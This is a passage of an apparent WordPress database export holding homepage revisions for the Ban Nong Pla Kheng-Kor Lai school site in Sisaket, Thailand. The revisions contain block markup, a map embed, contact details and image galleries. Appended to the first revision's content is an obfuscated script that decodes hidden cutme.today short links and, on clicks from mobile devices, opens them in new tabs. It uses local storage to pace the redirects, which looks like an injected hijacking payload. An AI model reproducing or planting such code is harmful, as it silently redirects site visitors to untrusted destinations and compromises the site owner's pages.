{\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 21:42:08','2024-08-07 14:42:08','',14,'http://pakhaeng.ssk.in.th/?p=669',0,'revision','',0),
(670,1,'2024-08-07 21:42:49','2024-08-07 14:42:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 